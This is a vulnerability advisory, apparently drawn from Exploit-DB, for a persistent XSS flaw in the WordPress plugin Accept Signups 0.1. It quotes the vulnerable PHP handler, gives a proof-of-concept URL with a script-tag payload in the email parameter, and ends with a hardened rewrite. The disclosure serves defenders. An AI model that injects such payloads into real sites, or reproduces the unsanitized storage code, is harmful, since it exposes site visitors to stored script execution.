Vendor: Accept Signups
By: clshack
CVSS: 8.8 (HIGH)
CWE: 79 (Persistent XSS)
Product Name: Accept Signups
Affected Version From: 0.1
Affected Version To: 0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:wordpress:3.03
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress 3.03
Year: 2010

WORDPRESS Plugin Accept Signups PERSISTENT XSS

A persistent XSS vulnerability exists in the WordPress plugin Accept Signups because user input is not sanitized. The vulnerable code is in accept-signups_submit.php, which inserts the submitted value into the database without sanitizing it. An attacker can exploit this by sending a malicious payload in the email parameter of a request to accept-signups_submit.php. The payload is stored in the database and executed when the page is loaded.

Mitigation:

Sanitize user input before inserting it into the database.

Exploit-DB raw data:

# Exploit Title: WORDPRESS Plugin Accept Signups PERSISTENT XSS
# Date: 21/12/2010
# Author: clshack
# Software Link: http://wordpress.org/extend/plugins/accept-signups/
# Version: 0.1
# Tested on: wordpress 3.03
# CVE :
Vulnerable code (accept-signups_submit.php):

    require_once('../../../wp-config.php'); // addslashes to GET and POST

    $e = $_GET['email']; // taken from the request with no validation

    function saveEmail($e) {
        global $wpdb;
        $tbl = '`' . DB_NAME . '`.`' . $wpdb->prefix . 'accept-signups`';
        // $e is interpolated into the statement and stored as submitted
        $q = "insert into " . $tbl . " (email, ip, timestamp) value ('$e', '" .
             $_SERVER['REMOTE_ADDR'] . "', now());";
        // prepare() is called without placeholders, so it binds nothing
        return $wpdb->query($wpdb->prepare($q));
    }

PoC:
http://localhost/wordpress/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72, 101, 108, 108, 111, 32, 58, 68, 32))</script>
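A hardened form of the handler quoted above, as an added example (not the plugin's code and not the vendor's patch): it validates the address with WordPress's is_email(), binds values through $wpdb->prepare() placeholders, and HTML-encodes stored values when they are printed. The renderSignupRow() helper and the response strings are hypothetical, since the page does not show where the plugin prints stored addresses.

```php
<?php
// Added example: hardened rewrite of accept-signups_submit.php.
require_once('../../../wp-config.php');

function saveEmail($raw) {
    global $wpdb;

    // Drop characters that are not legal in an address, then validate.
    // is_email() returns false for anything that is not a plausible
    // address, so markup such as the PoC value is rejected before storage.
    $email = sanitize_email($raw);
    if (!is_email($email)) {
        return false;
    }

    // Same table as the original. Identifiers cannot be bound as
    // placeholders, so the name is built only from trusted constants.
    $tbl = '`' . DB_NAME . '`.`' . $wpdb->prefix . 'accept-signups`';

    // Values go through %s placeholders; prepare() does the quoting.
    $q = $wpdb->prepare(
        "INSERT INTO $tbl (email, ip, timestamp) VALUES (%s, %s, NOW())",
        $email,
        $_SERVER['REMOTE_ADDR']
    );
    return $wpdb->query($q);
}

// Hypothetical output helper. A valid address may still contain
// characters such as & or ', and rows stored before the fix are
// untrusted, so every stored value is encoded when it is printed.
function renderSignupRow($row) {
    return '<tr><td>' . esc_html($row->email) . '</td><td>'
         . esc_html($row->ip) . '</td></tr>';
}

// WordPress adds slashes to $_GET; remove them before validating so
// the stored value is not double-escaped.
$raw = isset($_GET['email']) ? stripslashes($_GET['email']) : '';
echo saveEmail($raw) ? 'ok' : 'invalid address';
```

Validation on input and encoding on output are both needed here: the first keeps new payloads out of the table, the second neutralizes anything already stored.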